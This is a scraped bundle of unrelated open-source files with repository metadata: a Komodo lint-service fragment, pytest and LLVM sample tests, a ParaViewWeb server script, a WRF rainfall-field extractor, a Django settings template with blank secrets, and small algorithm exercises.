linter = components.classes[linterCID].createInstance(components.interfaces.koILinter)
except COMException, ex:
errmsg = "Internal Error creating a linter with CID '%s': %s"\
% (linterCID, ex)
raise ServerException(nsError.NS_ERROR_UNEXPECTED, errmsg)
self._linterCache[linterCID] = linter
return self._linterCache[linterCID]
def addRequest(self, request):
"""Add the given request to the queue.
If there is an error (e.g. bogus linterType) an exception is raised.
"""
log.info("KoLintService.addRequest(%s)", request.describe())
# Fill out the request (because document access and component
# creation must often be done in the main thread).
request.content = request.koDoc.buffer
request.encoding = request.koDoc.encoding
if request.linterType:
request.linter = self.getLinterForLanguage(request.linterType)
self.requests.put(request)
def cancelPendingRequests(self, uid):
log.info("KoLintService.cancelPendingRequests(uid='%s')", uid)
self.requests.remove_uid(uid)
# This does nothing to stop the reporting of results from a
# possible _currently running_ lint request for this uid.
# This is currently handled on the JavaScript side via the
# koILintRequest.rid attribute.
def _getEncodingLintResults(self, content, encoding):
"""Return lint results for encoding errors in the given document.
"content" is the document content as a unicode string
"encoding" is the currently selected encoding for the document
Returns a koLintResults instance.
"""
try:
encodedString = content.encode(encoding.python_encoding_name,
"strict")
except UnicodeError, ex:
pass # errors are handled after the try/except/else block
else:
return koLintResults() # no encoding errors
# Find the specific errors by encoding with "replace" and finding
# where those replacements were.
escapedContent = content.replace('?', 'X')
encodedString = escapedContent.encode(encoding.python_encoding_name,
"replace")
offset = 0
indices = []
while 1:
index = encodedString.find('?', offset)
if index == -1:
break
indices.append(index)
offset = index + 1
log.debug("encoding errors at indeces %s", indeces)
results = koLintResults()
lines = content.splitlines(1) # keep line terminators
offset = 0 # the current offset in the document
for i in range(len(lines)):
line = lines[i]
while indices and indices[0] < offset + len(line):
index = indices.pop(0) # this index is on this line
r = KoLintResult()
r.description = "This character cannot be represented with "\
"the current encoding: '%s'"\
% encoding.python_encoding_name
r.lineStart = i+1
r.lineEnd = i+1
r.columnStart = index - offset + 1
r.columnEnd = r.columnStart + 1
log.debug("encoding error: index=%d: %d,%d-%d,%d", index,
r.lineStart, r.columnStart, r.lineEnd, r.columnEnd)
r.severity = r.SEV_ERROR
results.addResult(r)
if not indices:
break
offset += len(line)
else:
raise ValueError("Did not find line and column for one or "
"more indeces in content: %s" % indeces)
return results
def _addMixedEOLWarnings(self, results, content, expectedEOL):
"""Add lint results (at the WARNING level) for each line that has
an unexpected EOL.
"results" in a koILintResults to which to add mixed EOL results.
"content" is the content to analyze
"expectedEOL" is the currently configured EOL for the document,
this must be on of the EOL_LF, EOL_CR, EOL_CRLF constants.
"""
import eollib
mixedEOLs = eollib.getMixedEOLLineNumbers(content, expectedEOL)
if not mixedEOLs:
return
def collapseContinuousLineNumbers(lineNos):
"""Return a collapsed group of continuous line numbers."""
results = []
start = -10
last = -10
for lineNo in lineNos:
if lineNo == last+1:
pass
else:
if start >= 0:
results.append((start, last))
start = lineNo
last = lineNo
if start >= 0:
results.append((start, last))
return results
# Add a warning lint result for each such line.
expectedEOLStr = eollib.eol2eolPref[expectedEOL]
lines = content.splitlines(1)
# For performance reasons, we collapse groups of continuous line
# numbers into the one line result - bug 92733.
for lineStart, lineEnd in collapseContinuousLineNumbers(mixedEOLs):
r = KoLintResult()
r.description = "This line does not end with the expected "\
"EOL: '%s' (select View | View EOL Markers)"\
% expectedEOLStr
r.lineStart = lineStart+1
r.lineEnd = lineEnd+1
r.columnStart = 1
r.columnEnd = len(lines[lineEnd]) + 1
r.severity = r.SEV_WARNING
results.addResult(r)
# When a new panel is added for a language in
# pref-syntax-checking.xul, we'll need to pull the generic marker
# out of any documents that adopted it. We can either do it when
# we open the doc (although we have to wait until we know its language),
# but this way we only check when we're about to lint.
#
# Also, it's too bad that doc prefs aren't versioned.
_no_longer_generic_languages = ["Python3", "HTML5"]
def _passesGenericCheck(self, request):
prefs = request.koDoc.prefs
languageName = request.koDoc.language
genericCheck = "genericLinter:" + languageName
if not prefs.hasPref(genericCheck):
return True
if languageName in self._no_longer_generic_languages:
prefs.deletePref(genericCheck)
return True
return prefs.getBooleanPref(genericCheck)
def run(self):
"""Process lint requests serially until told to stop.
Before the requested linter is run on a document it is first checked
for encoding problems (i.e. encoding is not sufficient for current
content).
"""
TIME_LINTS = False
log.info("manager thread: start")
while 1:
try:
# wait for next request
request = self.requests.get()
# quit if request is the quit sentinel
if request is None:
log.info("manager thread: quit sentinel")
break
# process the request
if TIME_LINTS: startlint = time.clock()
log.info("manager thread: process request: %r", request)
try:
# Look for encoding errors first.
results = self._getEncodingLintResults(request.content,
request.encoding)
if TIME_LINTS: endencodinglint = time.clock()
# If there were no encoding errors, try the
# requested linter.
if not results.getNumResults() and request.linter:
#XXX This is where context-sensitive linting args should
# be passed in, but linters don't support this yet.
log.debug("manager thread: call linter.lint(request)")
try:
if self._passesGenericCheck(request):
results = request.linter.lint(request)
#results = UnwrapObject(request.linter).lint(request)
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
except:
log.exception("Unexpected error while linting")
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
log.debug("manager thread: linter.lint(request) returned")
if TIME_LINTS: endlintlint = time.clock()
prefset = getProxiedEffectivePrefs(request)
if prefset.getBooleanPref("lintEOLs"):
# Also look for mixed-line endings warnings.
self._addMixedEOLWarnings(results, request.content,
request.koDoc.new_line_endings)
if TIME_LINTS:
endeollint = time.clock()
print "lint of '%s': encoding=%.3fs lint=%.3fs eol=%.3fs"\
% (request.koDoc.baseName,
endencodinglint-startlint,
endlintlint-endencodinglint,
endeollint-endlintlint)
request.results = results
except (ServerException, COMException), ex:
request.errorString = str(ex)
except:
# Any exceptions that are not ServerException or
# COMException are unexpected internal errors.
try:
err = "unexpected internal error checking '%s' with '%s' linter"\
% (request.koDoc.baseName, request.linterType)
log.exception(err)
request.errorString = err
except:
err = "Unexpected error in koLintService.run"
log.error(err)
request.errorString = err
else:
log.info("manager thread: lint results for uid %s: %r",
request.uid, results)
# Notify of request completion
# Note: this is not guaranteed to properly guard the proxy
# call because a context switch could happen in between the
# condition check and body. That is ok though. At worst it
# will raise an exception that will be trapped just below.
# The point is to catch the common case. I am pretty sure
# that there is no way to do this properly without going
# to great lengths.
if not self._shuttingDown:
try:
# Proxy this so the worker thread can report results on this iface.
lintBufferProxy = getProxyForObject(1,
components.interfaces.koILintBuffer, request.lintBuffer,
PROXY_ALWAYS | PROXY_SYNC)
lintBufferProxy.reportResults(request)
except COMException, ex:
# Ignore this error, which will happen if results
# are reported after the buffer has gone away (i.e.
# the file owning that buffer was closed):
# Traceback (most recent call last):
# File "...\koLintService.py", line 370, in run
# request.lintBuffer.reportResults(request)
# File "<XPCOMObject method 'reportResults'>", line 3, in reportResults
# Exception: 0x80570021 ()
errno = ex.args[0]
if errno == 0x80570021:
pass
else:
raise
except:
# Something bad happened, but don't let this thread die.
log.exception("unexpected error in the linting thread")
log.info("manager thread: end")
if __name__ == "__main__":
logging.basicConfig()
import pprint
class TestRequest:
def __init__(self, uid):
self.uid = uid
def __repr__(self):
return "<TestRequest: uid=%s>" % self.uid
q = RequestQueue()
if 0:
q.put(TestRequest("id_1"))
q.remove_uid("id_1")
print "item:"
sys.stdout.flush()
print q.get()
if 1:
q.put(TestRequest("id_1"))
q.put(TestRequest("id_2"))
pprint.pprint(q.queue)
print "item: ", q.get()
q.put(TestRequest("id_3"))
q.put(TestRequest("id_4"))
q.put(TestRequest("id_3"))
q.prepend(None)
pprint.pprint(q.queue)
q.remove_uid("id_3")
pprint.pprint(q.queue)
q.remove_uid("id_3")
sys.stdout.flush()
pprint.pprint(q.queue)
q.remove_uid("id_4")
pprint.pprint(q.queue)
print "item: ", q.get()
print "item: ", q.get()
pprint.pprint(q.queue)
| [
"[email protected]"
] | |
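Stripped of the XPCOM wiring, the service above is a single-consumer work queue: producers call `addRequest()`, one daemon thread drains the queue, and a `None` sentinel stops it. A minimal sketch of the same pattern with the standard library:

```python
import queue
import threading

q = queue.Queue()

def worker():
    while True:
        item = q.get()
        if item is None:  # quit sentinel, as in KoLintService.terminate()
            break
        print("processing", item)  # stand-in for the real lint work

t = threading.Thread(target=worker, daemon=True)
t.start()
q.put("request-1")
q.put(None)  # shut the worker down
t.join()
```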
7b0c4083d029a92441704bd296c1aef0ebbf84f2 | 2d4ab8e3ea9fd613ec0ae0c1956b68874c9b5f06 | /tests/pipelines/cnv_calling/test_xhmm_pca.py | e9dc13feb4ca41c6220481e9e7105e1e72bce443 | [] | no_license | biocodices/paip | 4abd39cbbd372a68592da87177c70c403d5a661d | 040a62c11e5bae306e2de4cc3e0a78772ee580b3 | refs/heads/master | 2021-01-17T20:48:28.642255 | 2019-07-26T14:30:58 | 2019-07-26T14:30:58 | 62,604,413 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | from unittest.mock import MagicMock
import pytest
from paip.pipelines.cnv_calling.xhmm_pca import XhmmPCA, EmptyInputMatrix
@pytest.fixture
def task(cohort_task_factory):
return cohort_task_factory(XhmmPCA)
def test_check_matrix(task):
# NOTE: Run this test before the next one, because the tested method
# check_matrix() will be mocked in test_run().
empty_matrix = pytest.helpers.file('empty_matrix.txt')
with pytest.raises(EmptyInputMatrix):
task.check_matrix(empty_matrix)
def test_run(task, mock_rename):
check_matrix = MagicMock()
task.check_matrix = check_matrix
task.run()
check_matrix.assert_called_once()
(command, ), kwargs = task.run_command.call_args
assert 'xhmm --PCA' in command
assert 'DATA.filtered_centered.RD.txt' in command
assert 'DATA-temp.RD_PCA' in command
assert mock_rename.call_count == 3
assert 'DATA-temp.RD_PCA' in mock_rename.call_args[0][0]
assert 'DATA.RD_PCA' in mock_rename.call_args[0][1]
| [
"[email protected]"
] | |
7df75a268c13f4de545db13ec51df02cd9cdbda5 | ddcc89dc88961f37d50c0f9d893f265bf34afdb3 | /test/test_simple_module_pass.py | f6be33ae365cbfb62819b6d08a8740fcd1ff5120 | [
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] | permissive | mulle-nat/property-syntax-modernizer | f351319314a0216e5e241fa03f9d95a3764a6590 | 93445534221840d0df6cfb2d2f4ceb73f37ac962 | refs/heads/master | 2020-08-07T08:57:02.149734 | 2019-10-07T12:46:11 | 2019-10-07T12:46:11 | 213,381,270 | 0 | 0 | Unlicense | 2019-10-07T13:11:51 | 2019-10-07T12:47:05 | C++ | UTF-8 | Python | false | false | 442 | py | import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
015c735e062ac63dde157d1b06e700b8009e14ce | 8a1241ac8ad91672aec81c878f2165a7678a1ad6 | /Web/Applications/Visualizer/server/pv_web_visualizer.py | 84ef98ae22d8c269ffca4d47cdd4e0a31d3dd2f0 | [
"MIT",
"LicenseRef-scancode-paraview-1.2",
"Apache-2.0",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause"
] | permissive | lmynsberge/ParaView | d9fbd0f4da197bc96172be8697ced76fe73852bf | 2a68ee496949becf499742dfdbecb41b1eda81a7 | refs/heads/master | 2021-01-22T16:18:25.241194 | 2013-11-11T15:01:02 | 2013-11-11T15:01:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,203 | py | r"""
This module is a ParaViewWeb server application.
The following command line illustrate how to use it::
$ pvpython .../pv_web_visualizer.py --data-dir /.../path-to-your-data-directory
--data-dir is used to list that directory on the server and let the client choose a file to load.
--load-file tries to load the given file (relative to data-dir), if any.
--ds-host None
Host name where pvserver has been started
--ds-port 11111
Port number to use to connect to pvserver
--rs-host None
Host name where renderserver has been started
--rs-port 22222
Port number to use to connect to the renderserver
Any ParaViewWeb executable script comes with a set of standard arguments that
can be overridden if need be::
--port 8080
Port number on which the HTTP server will listen to.
--content /path-to-web-content/
Directory that you want to server as static web content.
By default, this variable is empty which mean that we rely on another server
to deliver the static content and the current process only focus on the
WebSocket connectivity of clients.
--authKey vtkweb-secret
Secret key that should be provided by the client to allow it to make any
WebSocket communication. The client will assume if none is given that the
server expects "vtkweb-secret" as the secret key.
"""
# import to process args
import os
# import paraview modules.
from paraview.web import wamp as pv_wamp
from paraview.web import protocols as pv_protocols
from vtk.web import server
try:
import argparse
except ImportError:
# since Python 2.6 and earlier don't have argparse, we simply provide
# the source for the same as _argparse and we use it instead.
import _argparse as argparse
# =============================================================================
# Create custom Pipeline Manager class to handle clients requests
# =============================================================================
class _PipelineManager(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
dsHost = None
dsPort = 11111
rsHost = None
rsPort = 11111
fileToLoad = None
def initialize(self):
# Bring used components
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_PipelineManager.dsHost, _PipelineManager.dsPort, _PipelineManager.rsHost, _PipelineManager.rsPort))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStateLoader(_PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebPipelineManager(_PipelineManager.dataDir, _PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileManager(_PipelineManager.dataDir))
# Update authentication key to use
self.updateSecret(_PipelineManager.authKey)
# =============================================================================
# Main: Parse args and start server
# =============================================================================
if __name__ == "__main__":
# Create argument parser
parser = argparse.ArgumentParser(description="ParaView/Web Pipeline Manager web-application")
# Add default arguments
server.add_arguments(parser)
# Add local arguments
parser.add_argument("--data-dir", default=os.getcwd(), help="path to data directory to list", dest="path")
parser.add_argument("--load-file", default=None, help="File to load if any based on data-dir base path", dest="file")
parser.add_argument("--ds-host", default=None, help="Hostname to connect to for DataServer", dest="dsHost")
parser.add_argument("--ds-port", default=11111, type=int, help="Port number to connect to for DataServer", dest="dsPort")
parser.add_argument("--rs-host", default=None, help="Hostname to connect to for RenderServer", dest="rsHost")
parser.add_argument("--rs-port", default=11111, type=int, help="Port number to connect to for RenderServer", dest="rsPort")
# Exctract arguments
args = parser.parse_args()
# Configure our current application
_PipelineManager.authKey = args.authKey
_PipelineManager.dataDir = args.path
_PipelineManager.dsHost = args.dsHost
_PipelineManager.dsPort = args.dsPort
_PipelineManager.rsHost = args.rsHost
_PipelineManager.rsPort = args.rsPort
if args.file:
_PipelineManager.fileToLoad = args.path + '/' + args.file
# Start server
server.start_webserver(options=args, protocol=_PipelineManager)
| [
"[email protected]"
] | |
aa80166792010844c80020d87de369afec96d42a | 5eff9df4d276e83c68ce843d58868499858f701a | /Leetcode - FB/p0350.py | 3780986eb5c2d856d4e29deeeacac48b9f10fdf7 | [] | no_license | arunraman/Code-Katas | b6723deb00caed58f0c9a1cafdbe807e39e96961 | 7fe3582fa6acf59a2620fe73e1e14bd8635bbee8 | refs/heads/master | 2023-03-04T17:27:44.037145 | 2023-03-02T21:09:53 | 2023-03-02T21:09:53 | 25,232,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 456 | py | class p0349(object):
def intersectiontwoArrays(self, nums1, nums2):
dict1 = dict()
for i in nums1:
if i not in dict1:
dict1[i] = 1
else:
dict1[i] += 1
ret = []
for i in nums2:
if i in dict1 and dict1[i] > 0:
ret.append(i)
dict1[i] -= 1
return ret
S = p0349()
print S.intersectiontwoArrays([1, 2, 2, 1], [2, 2]) | [
"[email protected]"
] | |
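The counting-dict solution above runs in O(m+n) time and space; when the inputs are sorted (or sorting them is acceptable), a two-pointer variant needs no auxiliary dict. A sketch:

```python
def intersect_sorted(nums1, nums2):
    # assumes both inputs are sorted
    i = j = 0
    out = []
    while i < len(nums1) and j < len(nums2):
        if nums1[i] < nums2[j]:
            i += 1
        elif nums1[i] > nums2[j]:
            j += 1
        else:
            out.append(nums1[i])
            i += 1
            j += 1
    return out

print(intersect_sorted(sorted([1, 2, 2, 1]), sorted([2, 2])))  # [2, 2]
```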
205e2c6f3f8e1f3fd358d21e4ccbb1da32701a93 | 021a3dff055d4b3e40aafc63f0029dc280466233 | /db_scripts/curw_fcst/rfield/gen_rfield_kelani_basin_parallelized_optimized.py | e2bed1eb35b657a3592bea9d212fe72a3c8b6482 | [] | no_license | shadhini/curw_helpers | 45efe90d887c702b3a3f5877163647e220d230e4 | 101d896f8b589b478ef146b5b4dd99ec24f2dc84 | refs/heads/master | 2021-07-03T02:53:13.398052 | 2020-10-28T03:39:58 | 2020-10-28T03:39:58 | 185,217,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,854 | py | #!/home/uwcc-admin/curw_rfield_extractor/venv/bin/python3
import traceback
import pymysql
import json
import getopt
import sys
import os
import re
import multiprocessing as mp
from datetime import datetime, timedelta
# connection params
HOST = ""
USER = ""
PASSWORD = ""
DB =""
PORT = ""
VALID_MODELS = ["WRF_A", "WRF_C", "WRF_E", "WRF_SE"]
VALID_VERSIONS = ["v3", "v4", "4.0"]
SIM_TAGS = ["evening_18hrs"]
root_directory = '/var/www/html'
bucket_root = '/mnt/disks/wrf_nfs'
def read_attribute_from_config_file(attribute, config):
"""
:param attribute: key name of the config json file
:param config: loaded json file
:return:
"""
if attribute in config and (config[attribute]!=""):
return config[attribute]
else:
print("{} not specified in config file.".format(attribute))
exit(1)
def write_to_file(file_name, data):
with open(file_name, 'w+') as f:
f.write('\n'.join(data))
def create_rfield(connection, wrf_model, version, sim_tag, timestamp):
# rfield = [['latitude', 'longitude', 'rainfall']]
rfield = []
with connection.cursor() as cursor0:
cursor0.callproc('get_d03_rfield_kelani_basin_rainfall', (wrf_model, version, sim_tag, timestamp))
results = cursor0.fetchall()
for result in results:
rfield.append('{}'.format(result.get('value')))
write_to_file('{}/wrf/{}/{}/rfield/kelani_basin/{}_{}_{}_rfield.txt'
.format(root_directory, version, sim_tag, wrf_model, version, timestamp.strftime('%Y-%m-%d_%H-%M')), rfield)
#############################
# Raw WRF RFIELD GENERATION #
#############################
def gen_rfield_d03_kelani_basin(wrf_model, version, sim_tag):
# remove outdated rfields
try:
os.system("sudo rm {}/wrf/{}/{}/rfield/kelani_basin/{}_{}_*".format(root_directory, version, sim_tag, wrf_model, version))
except Exception as e:
traceback.print_exc()
start_time = ''
end_time = ''
now = datetime.strptime((datetime.now()+timedelta(hours=5, minutes=30)).strftime('%Y-%m-%d 00:00:00'), '%Y-%m-%d %H:%M:%S')
try:
# Connect to the database
connection = pymysql.connect(host=HOST, user=USER, password=PASSWORD, db=DB,
cursorclass=pymysql.cursors.DictCursor)
# Extract timeseries start time and end time
with connection.cursor() as cursor1:
cursor1.callproc('get_TS_start_end', (wrf_model, version, sim_tag))
result = cursor1.fetchone()
start_time = result.get('start')
end_time = result.get('end')
if end_time > (now + timedelta(days=1)):
# Extract rfields
timestamp = start_time
while timestamp <= end_time:
create_rfield(connection=connection, wrf_model=wrf_model, version=version, sim_tag=sim_tag,
timestamp=timestamp)
timestamp = datetime.strptime(str(timestamp), '%Y-%m-%d %H:%M:%S') + timedelta(minutes=15)
return True
except Exception as ex:
traceback.print_exc()
return False
finally:
connection.close()
print("Process finished")
def usage():
usageText = """
Usage: python gen_rfield_kelani_basin_parallelized_optimized.py -m WRF_X1,WRF_X2,WRF_X3 -v vX -s "evening_18hrs"
-h --help Show usage
-m --wrf_model List of WRF models (e.g. WRF_A, WRF_E). Compulsory arg
-v --version WRF model version (e.g. v4, v3). Compulsory arg
-s --sim_tag Simulation tag (e.g. evening_18hrs). Compulsory arg
"""
print(usageText)
if __name__=="__main__":
mp_pool = None
try:
wrf_models = None
version = None
sim_tag = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:m:v:s:",
["help", "wrf_model=", "version=", "sim_tag="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-m", "--wrf_model"):
wrf_models = arg.strip()
elif opt in ("-v", "--version"):
version = arg.strip()
elif opt in ("-s", "--sim_tag"):
sim_tag = arg.strip()
print(wrf_models, version, sim_tag)
print(VALID_MODELS, VALID_VERSIONS, SIM_TAGS)
# load connection parameters
config = json.loads(open('/home/uwcc-admin/curw_rfield_extractor/db_config.json').read())
# connection params
HOST = read_attribute_from_config_file('host', config)
USER = read_attribute_from_config_file('user', config)
PASSWORD = read_attribute_from_config_file('password', config)
DB = read_attribute_from_config_file('db', config)
PORT = read_attribute_from_config_file('port', config)
if wrf_models is None:
usage()
exit(1)
wrf_model_list = wrf_models.split(',')
for wrf_model in wrf_model_list:
if wrf_model not in VALID_MODELS:
usage()
exit(1)
if version is None or version not in VALID_VERSIONS:
usage()
exit(1)
if sim_tag is None or sim_tag not in SIM_TAGS:
usage()
exit(1)
rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(root_directory, version, sim_tag)
try:
os.makedirs(rfield_home)
except FileExistsError:
# directory already exists
pass
gfs_data_hour = re.findall(r'\d+', sim_tag)[0]
bucket_rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(bucket_root, version, gfs_data_hour)
try:
os.makedirs(bucket_rfield_home)
except FileExistsError:
# directory already exists
pass
# copy file containing xy coordinates to the rfield home
try:
os.system("cp kelani_basin_xy.csv {}/xy.csv".format(rfield_home))
except Exception:
pass
mp_pool = mp.Pool(mp.cpu_count())
results = mp_pool.starmap(gen_rfield_d03_kelani_basin,
[(wrf_model, version, sim_tag) for wrf_model in wrf_model_list])
# results = mp_pool.starmap_async(gen_rfield_d03_kelani_basin,
# [(wrf_model, version, sim_tag) for wrf_model in wrf_model_list]).get()
print("results: ", results)
except Exception as e:
print('JSON config data loading error.')
traceback.print_exc()
finally:
if mp_pool is not None:
mp_pool.close()
os.system("tar -czvf {}/rfield.tar.gz {}/*".format(bucket_rfield_home, rfield_home))
| [
"[email protected]"
] | |
d1f9c5d8fe6a52dd2e130204f45e94850dfa5e0f | 33f86c1678d2f5e15da77885e0bf770f405201a4 | /tcamp/local_settings.example.py | b5b48f86971536c25ec25d5c61d13c2805a1304e | [
"BSD-3-Clause"
] | permissive | imclab/tcamp | 5410c9549ed7731575e7312acfed7b8e4cd0c58d | 111cabab90b2c8cf651ee480520bc43a33f30844 | refs/heads/master | 2021-01-18T12:15:58.484183 | 2014-03-05T21:36:00 | 2014-03-05T21:36:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,832 | py | DEBUG = True
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1', )
SECRET_KEY = ''
DATABASES = {
'local': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'staging': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'production': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
DATABASES['default'] = DATABASES['local']
FAVICON = ''
APPLE_TOUCH_ICON = ''
SHARING_IMAGE = ''
FB_APP_ID = ''
GOOGLE_ANALYTICS_ID = ''
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
ASSET_SITE_VERSION = '1.0'
COMPRESS_URL = ''
COMPRESS_STORAGE = ''
STATICFILES_STORAGE = COMPRESS_STORAGE
STATIC_URL = COMPRESS_URL
POSTMARK_API_KEY = ''
POSTMARK_SENDER = ''
GOOGLEAUTH_DOMAIN = ''
GOOGLEAUTH_REALM = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
FACEBOOK_APP_ID = ''
FACEBOOK_API_SECRET = ''
GOOGLE_OAUTH2_CLIENT_ID = ''
GOOGLE_OAUTH2_CLIENT_SECRET = ''
GITHUB_APP_ID = ''
GITHUB_API_SECRET = ''
DISQUS_CLIENT_ID = ''
DISQUS_CLIENT_SECRET = ''
AKISMET_KEY = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
TWITTER_ACCESS_KEY = ''
TWITTER_ACCESS_SECRET = ''
DISQUS_SHORTNAME = ''
BRAINSTORM_USE_DISQUS = True
BRAINSTORM_LOGIN_OPTIONS = (
('Twitter', '/login/twitter/'),
('Facebook', '/login/facebook/'),
('Google', '/login/google-oauth2/'),
('Github', '/login/github/'),
)
VARNISH_MANAGEMENT_ADDRS = ()
TWILIO_ACCOUNT_SID = ''
TWILIO_AUTH_TOKEN = ''
RAVEN_CONFIG = {
'dsn': '',
} | [
"[email protected]"
] | |
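Example settings files like the one above are typically pulled in by a star-import at the bottom of the main settings module, so machine-specific values override the defaults; a common sketch (the exact wiring varies by project):

```python
# at the bottom of settings.py (sketch)
try:
    from local_settings import *  # noqa: F401,F403
except ImportError:
    pass  # no local overrides; keep the defaults above
```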
af0ff074d35191259400a9937db81997e7772ffd | d52cb4c2e880875944b14da0b8a9542235942ac8 | /geeksforgeeks/heap/6_Find_median_in_stream.py | 521a8f79468f59a0c175f5766c7681ae8d0a619c | [] | no_license | saparia-data/data_structure | fbd61535b68f92143b2cb2679377c0f56f424670 | 2e8700cfdaeefe0093e5b4fb2704b1abcd300d02 | refs/heads/master | 2023-05-08T18:54:52.250941 | 2021-06-04T05:44:29 | 2021-06-04T05:44:29 | 296,071,146 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,382 | py | '''
Given an input stream of N integers.
The task is to insert these numbers into a new stream and find the median of the stream formed by each insertion of X to the new stream.
Example 1:
Input:
N = 4
X[] = 5,15,1,3
Output:
5
10
5
4
Explanation:Flow in stream : 5, 15, 1, 3
5 goes to stream --> median 5 (5)
15 goes to stream --> median 10 (5,15)
1 goes to stream --> median 5 (5,15,1)
3 goes to stream --> median 4 (5,15,1 3)
'''
import heapq
min_heap = []
max_heap = []
def balanceHeaps():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
Balance the two heaps size , such that difference is not more than one.
'''
if abs(len(min_heap)-len(max_heap)) <= 1:
return # already balanced
# take out one element from top of heap with greater size, and push in other heap
if len(min_heap)>len(max_heap): # min_heap has more data
value_top = heapq.heappop(min_heap)
# push in max heap, using negative as it is implemented on min heap
heapq.heappush(max_heap,-1*value_top) # value inserted in max heap
else:
# take from max heap and insert in min heap
value_top = -1* heapq.heappop(max_heap) # negate it to get original value
heapq.heappush(min_heap,value_top) # insert value in min heap
return
def getMedian():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:return: return the median of the data received till now.
'''
# cases with odd number of elements in data
if len(max_heap)>len(min_heap):
# return the element from top of max_heap
value = heapq.heappop(max_heap)
heapq.heappush(max_heap,value) # push element back in max heap
return (-1*value)
elif len(min_heap)>len(max_heap):
# return the top element from min heap
value = heapq.heappop(min_heap)
heapq.heappush(min_heap,value)
return value
else:
# the number of elements is even in data, return the average of the two values
val_min = heapq.heappop(min_heap)
val_max = -1*heapq.heappop(max_heap)
# push these values back in the heap
heapq.heappush(min_heap,val_min)
heapq.heappush(max_heap,-1*val_max)
return ((val_max+val_min)//2) # return the average of the two
def insertHeaps(x):
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:param x: value to be inserted
:return: None
'''
# if top of min heap is less than x, x belongs in upper half
least_upperhalf = heapq.heappop(min_heap) if len(min_heap) else -1 # minimum element of upper half or -1 if empty
# if popped, push in min_heap again
if least_upperhalf!=-1:
heapq.heappush(min_heap,least_upperhalf)
if x >= least_upperhalf :
heapq.heappush(min_heap,x) # insert in min_heap
else:
# x belongs in lower half
# as this is a max_heap implemented on heapq, hence negative of x will be inserted to maintain
# max heap property.
heapq.heappush(max_heap,-1*x)
arr = [5,15,1,3]
n = len(arr)
for i in range(n):
insertHeaps(arr[i])
balanceHeaps()
print(getMedian()) | [
"[email protected]"
] | |
